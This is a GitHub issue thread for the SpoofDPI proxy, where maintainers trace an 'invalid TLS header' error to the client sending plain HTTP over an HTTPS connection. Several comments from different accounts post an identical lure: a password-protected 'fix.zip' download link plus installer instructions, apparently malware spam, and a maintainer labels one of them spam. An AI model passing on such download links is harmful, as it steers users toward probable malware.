### ISSUE TITLE
error reading client hello

### ISSUE THREAD

**Issue by kommunist** [xvzc/SpoofDPI#197]
### Version

spoof-dpi v0.10.11

### Operating System

armbian

### How are you running SpoofDPI?

spoof-dpi --addr=192.168.2.23 --port 8081 --debug

### Description

error reading client hello from 192.168.2.1:56784: invalid 
TLS header. Type: c5, ProtoVersion: 118b, PayloadLen: 68f8

**Comment by LiquidTheDangerous** [comment]
@kommunist Expected a valid header from the client, received a strange one. Is there a stable way to reproduce this?

**Comment by kommunist** [comment]
@LiquidTheDangerous , of course. Is this what do you want?

```bash
bananapipro:~:# sudo journalctl -u spoof-dpi.service --no-pager | grep 55bb099d-5ecab492-e4c98600-bcb293e2
Aug 25 15:02:47 bananapipro spoof-dpi[8250]: 2024-08-25T15:02:47Z DBG 55bb099d-5ecab492-e4c98600-bcb293e2 [HTTPS] new connection to the server 192.168.2.23:46308 -> 91.105.192.100
Aug 25 15:02:47 bananapipro spoof-dpi[8250]: 2024-08-25T15:02:47Z DBG 55bb099d-5ecab492-e4c98600-bcb293e2 [HTTPS] sent connection estabalished to 192.168.2.1:58642
Aug 25 15:02:47 bananapipro spoof-dpi[8250]: 2024-08-25T15:02:47Z DBG 55bb099d-5ecab492-e4c98600-bcb293e2 [HTTPS] error reading client hello from 192.168.2.1:58642: invalid TLS header. Type: 50, ProtoVersion: 4f53, PayloadLen: 5420
```

**Comment by LiquidTheDangerous** [comment]
Can you do it from a client device?

```shell
curl --request GET --url https://www.google.com --proxy <spoof-dpi-host>:<port>
```

**Comment by LiquidTheDangerous** [comment]
Did a little magic. From previous attachment, Looks like the client is trying to do an HTTP request instead of a handshake. How are you using the proxy?

```py
>>> list(map(chr, [0x50, 0x4f, 0x53, 0x54, 0x20]))

>>> ['P', 'O', 'S', 'T', ' ']

```

**Comment by xvzc** [comment]
@LiquidTheDangerous Maybe the client is trying to send a HTTP Request through the existing socket which has been created for HTTPS connection. Current version of spoof-dpi cannot handle that case.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LiquidTheDangerous** [comment]
I think it's worth finding out the proxy settings on the client device

@kommunist

**Comment by LiquidTheDangerous** [comment]
@WSA1k what is that?

**Comment by xvzc** [comment]
It's a spam

**Comment by LiquidTheDangerous** [comment]
@xvzc I think we need to find a stable way to reproduce this first.

**Comment by kommunist** [comment]
I use spoof as proxy for full trafic from separated network for TV. I build proxy from Keenetic router to singleboard bananapi.

I will generate and post logs today later

**Comment by LiquidTheDangerous** [comment]
@kommunist 
Is there a proxy setting on your TV? Or are you just redirecting all traffic through spoof dpi?

**Comment by kommunist** [comment]
No, i build proxy from router. 
I redirect all trafic from some network trough spoof dpi.

**Comment by xvzc** [comment]
You mean spoof-dpi is running on your router?

**Comment by kommunist** [comment]
No, i use bananapi on arm architecture in this network and proxy full trafic over this.

**Comment by kommunist** [comment]
This is full log. Thire isn`t problem with hello, but another problem with "closed network connection"

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kommunist** [comment]
I resolve my problems, thank you.
Problem was on DoH on my router, but i think that is problem with hello request.
